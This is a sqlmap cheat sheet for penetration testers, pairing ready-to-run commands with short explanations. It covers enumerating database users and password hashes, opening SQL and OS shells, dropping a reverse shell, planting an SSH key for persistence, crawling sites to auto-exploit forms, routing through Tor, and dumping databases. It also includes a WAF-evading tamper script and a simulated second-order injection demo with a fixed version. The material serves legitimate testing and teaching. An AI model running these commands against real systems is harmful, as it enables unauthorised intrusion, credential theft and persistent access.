SQLMap

sqlmap.py

Basic arguments for SQLmap

sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent \
  --threads=10 --level=5 --risk=3 --eta --dbms=MySQL --os=Linux \
  --banner --is-dba --users --passwords --current-user --dbs
  1. -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")

  2. -p TESTPARAMETER Testable parameter(s)

  3. By default sqlmap performs HTTP requests with the following User-Agent header value:

    sqlmap/1.0-dev-xxxxxxx (http://sqlmap.org)

    However, it is possible to override it with the option --user-agent by providing a custom User-Agent as the option's argument (if --random-agent is also given, the random one wins).

  4. --random-agent, sqlmap will randomly select a User-Agent from the ./txt/user-agents.txt

  5. --threads=THREADS Max number of concurrent HTTP(s) requests (default 1)

  6. --level=LEVEL Level of tests to perform (1-5, default 1)

  7. --risk=RISK Risk of tests to perform (1-3, default 1)

  8. --eta Display for each output the estimated time of arrival

  9. --dbms=DBMS Force back-end DBMS to provided value

  10. --os=OS Force back-end DBMS operating system to provided value

  11. -b, --banner Retrieve DBMS banner

  12. --is-dba Detect if the DBMS current user is DBA

  13. --users Enumerate DBMS users

  14. --passwords Enumerate DBMS users password hashes

  15. --current-user Retrieve DBMS current user

  16. --dbs Enumerate DBMS databases

Load a request file and use mobile user-agent

sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
  • -r REQUESTFILE Load HTTP request from a file

  • --safe-url=SAFEURL URL address to visit frequently during testing

  • --mobile Imitate smartphone through HTTP User-Agent header

  • --safe-freq=SAFE.. Regular requests between visits to a safe URL

python sqlmap.py -u "http://example.com" --data "username=admin&password=pass"  --headers="x-forwarded-for:127.0.0.1*"
  • -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")

  • --data=DATA Data string to be sent through POST (e.g. "id=1")

  • --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123")

  • The '*' is sqlmap's custom injection marker: it tells sqlmap to inject at exactly that position (here inside the X-Forwarded-For header value) instead of guessing parameters

Second-order attack

Options: --second-url and --second-req (older sqlmap releases named the first one --second-order)

A second-order SQL injection is one where the result of a payload injected on one vulnerable page shows up on a different page. That usually happens because the first page stores the user-supplied input in the database and the second page reads it back and uses it in another query without sanitising it.

You can tell sqlmap to test for this type of SQL injection with --second-url (the URL of the page where the result is shown) or --second-req (a request file for that page).

sqlmap -r /tmp/r.txt --dbms MySQL --second-url "http://targetapp/wishlist" -v 3

sqlmap -r 1.txt --dbms MySQL --second-url "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" --dbs
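The pattern sqlmap is looking for with --second-url, simulated end to end. This is an added example, not code from the sqlmap project; the scenario (a "register" page that stores the username safely and a "wishlist" page that later concatenates it into a second query), the table names and the sample rows are all constructed for illustration.

```python
"""Second-order SQL injection, simulated end to end (added illustration).

Constructed scenario: the "register" page stores the username with a
parameterised INSERT (safe on that page), and a separate "wishlist" page reads
the stored username back and concatenates it into a second query. The payload
is inert where it is submitted and fires where it is re-used, which is why
sqlmap needs --second-url / --second-req to observe the effect.
"""
import sqlite3


def setup_db():
    """In-memory database with constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.execute("CREATE TABLE wishlist (username TEXT, item TEXT)")
    conn.executemany(
        "INSERT INTO wishlist VALUES (?, ?)",
        [("alice", "book"), ("bob", "lamp"), ("bob", "desk")],
    )
    conn.commit()
    return conn


def register(conn, username):
    """First page: the input is stored safely, so no injection happens here."""
    cur = conn.execute("INSERT INTO users (username) VALUES (?)", (username,))
    conn.commit()
    return cur.lastrowid


def wishlist_vulnerable(conn, user_id):
    """Second page: the stored username is trusted and formatted into SQL."""
    row = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    username = row[0]
    # VULNERABLE: data coming from the database is treated as trusted.
    query = "SELECT item FROM wishlist WHERE username = '%s'" % username
    return sorted(r[0] for r in conn.execute(query))


def wishlist_fixed(conn, user_id):
    """Same page with the second query parameterised as well."""
    row = conn.execute("SELECT username FROM users WHERE id = ?", (user_id,)).fetchone()
    username = row[0]
    return sorted(r[0] for r in conn.execute(
        "SELECT item FROM wishlist WHERE username = ?", (username,)))


def demo():
    """Returns what each page shows for a benign user and for the payload user."""
    conn = setup_db()
    benign_id = register(conn, "alice")
    payload_id = register(conn, "x' OR '1'='1")   # constructed second-order payload
    return {
        "benign": wishlist_vulnerable(conn, benign_id),        # only alice's items
        "vulnerable": wishlist_vulnerable(conn, payload_id),   # every item in the table
        "fixed": wishlist_fixed(conn, payload_id),             # nothing leaks
    }


if __name__ == "__main__":
    print(demo())
```

When testing such an application with sqlmap, the request file passed with -r is the registration request and --second-url points at the wishlist page, because the registration response alone never changes.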

Shell

SQL Shell
python sqlmap.py -u "http://example.com/?id=1"  -p id --sql-shell

Simple Shell
python sqlmap.py -u "http://example.com/?id=1"  -p id --os-shell

Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1"  -p id --os-pwn

SSH Shell by dropping an SSH key
python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-dest=/home/user/.ssh/authorized_keys
  • --file-write=WFILE Local file to write to the back-end DBMS file system (here the attacker's public key)

  • --file-dest=DFILE Absolute destination path on the target; the option takes a file path, not a directory

  • Writing files needs DBMS file privileges (on MySQL the FILE privilege and a non-restrictive secure_file_priv) and the destination must be writable by the OS account the DBMS runs as. sqlmap writes a whole file and cannot append to an existing one.

Crawl a website with SQLmap and auto-exploit

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
  • --batch = non-interactive mode: sqlmap normally asks questions, this accepts the default answer to all of them

  • --crawl=CRAWLDEPTH = crawl the website starting from the target URL, to the given depth

  • --forms = parse and test forms found on the crawled pages

TOR

sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5

Proxy

sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080"
sqlmap -u "https://test.com/index.php?id=99" --load-cookies=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3
  • --proxy=PROXY Use a proxy to connect to the target URL (e.g. Burp on 127.0.0.1:8080 to inspect what sqlmap sends)

  • --load-cookies=LOADCOOKIES File containing cookies in Netscape/wget format

  • -f, --fingerprint Perform an extensive DBMS version fingerprint

  • --time-sec=TIMESEC Seconds to delay the DBMS response (default 5), used by time-based blind tests

Using prefix/suffix to shape the injection

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "
  • --prefix=PREFIX Injection payload prefix string (e.g. to close a bracket the original query opens)

  • --suffix=SUFFIX Injection payload suffix string (here a comment that cuts off the rest of the original query)

General tamper option

--tamper=TAMPER Use given script(s) for tampering injection data, comma-separated for several (e.g. --tamper=space2comment,randomcase)

Tamper list

--list-tampers Display list of available tamper scripts
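What a tamper script has to provide, as an added example (not one of sqlmap's own scripts). The file name tamper/space2comment_xff.py and the two filters it targets are assumptions for illustration; the hooks themselves (a module-level __priority__, a dependencies() function and tamper(payload, **kwargs) returning the rewritten payload, with the request headers reachable through kwargs["headers"]) are sqlmap's tamper interface.

```python
"""Custom tamper script for sqlmap (added example, not part of sqlmap).

Assumed file name: tamper/space2comment_xff.py inside the sqlmap tree, used
with --tamper=space2comment_xff. sqlmap calls tamper(payload, **kwargs) for
every payload and sends whatever it returns; kwargs["headers"] is the request
header dict and can be edited in place. Two transformations are applied:
  * spaces outside string literals become /**/ (for an assumed WAF rule that
    keys on "AND " / "OR " with a literal space), and
  * an X-Forwarded-For header is added (for an assumed filter that trusts
    loopback). Both filters are hypothetical; they only exercise the hooks.
"""
try:
    from lib.core.enums import PRIORITY   # resolves when imported by sqlmap
except ImportError:                        # stand-alone fallback for running this file alone
    class PRIORITY:
        NORMAL = 0

__priority__ = PRIORITY.NORMAL


def dependencies():
    """Called once by sqlmap; used to warn about requirements (none here)."""
    pass


def tamper(payload, **kwargs):
    """Rewrite one payload and (optionally) its request headers.

    '1 AND 1=1'         -> '1/**/AND/**/1=1'
    "' AND 'a b'='a b"  -> "'/**/AND/**/'a b'='a b"  (spaces inside quotes kept)
    """
    headers = kwargs.get("headers", {})
    headers["X-Forwarded-For"] = "127.0.0.1"   # assumed trust-based filter bypass

    if not payload:
        return payload

    out = []
    in_string = False
    for i, ch in enumerate(payload):
        # A leading quote closes the application's own literal, not a new string.
        if ch == "'" and i > 0:
            in_string = not in_string
        elif ch.isspace() and not in_string:
            out.append("/**/")
            continue
        out.append(ch)
    return "".join(out)
```

Keep the transformation idempotent and deterministic where you can: sqlmap compares responses across many requests, and a tamper that randomises output makes boolean-based detection noisier than the filter it is meant to bypass.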

SQLmap without SQL injection

You can use sqlmap to connect directly to a database over its network port instead of through a web URL. This needs valid credentials and the matching Python client library (e.g. PyMySQL for MySQL), otherwise sqlmap stops with a "requires ... third-party library" message.

sqlmap.py -d "mysql://user:pass@ip/database" --dump-all 
